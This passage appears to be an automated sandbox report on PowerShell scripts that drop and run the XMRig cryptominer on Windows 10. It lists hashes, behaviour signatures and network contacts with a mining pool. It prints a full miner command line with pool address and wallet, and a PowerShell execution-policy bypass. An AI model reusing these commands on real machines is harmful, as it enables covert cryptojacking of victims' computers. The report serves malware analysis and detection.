SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2108-11-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-12-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-14-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/2108-15-0x0000021E22F40000-0x0000021E22F52000-memory.dmp

memory/2108-16-0x0000021E221E0000-0x0000021E221EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3568-47-0x0000020DC4520000-0x0000020DC4540000-memory.dmp

memory/3568-48-0x0000020DC4570000-0x0000020DC4590000-memory.dmp

memory/3568-49-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/2108-50-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/3568-52-0x0000020DC5E40000-0x0000020DC5E60000-memory.dmp

memory/2108-51-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp

memory/3568-53-0x0000020DC5E60000-0x0000020DC5E80000-memory.dmp

memory/3568-54-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/2108-55-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp

memory/3568-56-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-58-0x0000020DC5E40000-0x0000020DC5E60000-memory.dmp

memory/3568-57-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-59-0x0000020DC5E60000-0x0000020DC5E80000-memory.dmp

memory/3568-60-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-61-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-62-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-63-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-64-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-65-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-66-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-67-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-68-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-69-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-70-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-71-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-72-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-73-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-74-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-75-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-76-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-77-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-78-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-79-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-80-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-81-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-82-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-83-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-84-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-85-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-86-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-87-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-88-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-89-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-90-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-91-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-92-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-93-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-94-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-95-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-96-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-97-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-98-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-99-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-100-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-101-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-102-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-103-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-104-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-105-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-106-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-107-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-108-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-109-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-110-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-111-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-112-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-113-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-114-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-115-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-116-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-117-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

memory/3568-118-0x00007FF7572E0000-0x00007FF757F13000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1396 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.200.42:443 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

memory/2456-0-0x00007FFA36593000-0x00007FFA36595000-memory.dmp

memory/2456-6-0x000001CACD6E0000-0x000001CACD702000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eudgennn.nme.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2456-11-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/2456-12-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/2456-13-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/2456-15-0x000001CACDA70000-0x000001CACDA82000-memory.dmp

memory/2456-16-0x000001CAB30D0000-0x000001CAB30DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2456-48-0x00007FFA36593000-0x00007FFA36595000-memory.dmp

memory/3404-47-0x0000028444760000-0x0000028444780000-memory.dmp

memory/2456-49-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/2456-50-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/3404-51-0x0000028446270000-0x0000028446290000-memory.dmp

memory/2456-52-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

memory/3404-53-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-54-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-55-0x0000028446290000-0x00000284462B0000-memory.dmp

memory/3404-56-0x00000284462B0000-0x00000284462D0000-memory.dmp

memory/3404-57-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-58-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-59-0x0000028446290000-0x00000284462B0000-memory.dmp

memory/3404-60-0x00000284462B0000-0x00000284462D0000-memory.dmp

memory/3404-61-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-62-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-63-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-64-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-65-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-66-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-67-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-68-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-69-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-70-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-71-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-72-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-73-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-74-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-75-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-76-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-77-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-78-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-79-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-80-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-81-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-82-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-83-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-84-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-85-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-86-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-87-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-88-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-89-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-90-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-91-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-92-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-93-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-94-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-95-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-96-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-97-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-98-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-99-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-100-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-101-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-102-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-103-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-104-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-105-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-106-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-107-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-108-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-109-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-110-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-111-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-112-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-113-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-114-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-115-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-116-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-117-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-118-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

memory/3404-119-0x00007FF6D8C30000-0x00007FF6D9863000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win10v2004-20240226-en

Max time kernel

1797s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4144 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3984 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp

Files

memory/3304-0-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klbhpycc.bne.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3304-7-0x000002686AB70000-0x000002686AB92000-memory.dmp

memory/3304-11-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/3304-12-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/3304-13-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/3304-14-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

memory/3304-15-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/3304-17-0x000002686B060000-0x000002686B072000-memory.dmp

memory/3304-18-0x000002686B040000-0x000002686B04A000-memory.dmp

memory/3304-19-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1592-50-0x0000027082200000-0x0000027082220000-memory.dmp

memory/3304-51-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/1592-52-0x0000027082450000-0x0000027082470000-memory.dmp

memory/1592-53-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-54-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-56-0x0000027083C40000-0x0000027083C60000-memory.dmp

memory/1592-55-0x0000027083C20000-0x0000027083C40000-memory.dmp

memory/1592-57-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-58-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-60-0x0000027083C40000-0x0000027083C60000-memory.dmp

memory/1592-59-0x0000027083C20000-0x0000027083C40000-memory.dmp

memory/1592-61-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-62-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-63-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-64-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-65-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-66-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-67-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-68-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-69-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-70-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-71-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-72-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-73-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-74-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-75-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-76-0x00007FF663920000-0x00007FF664553000-memory.dmp

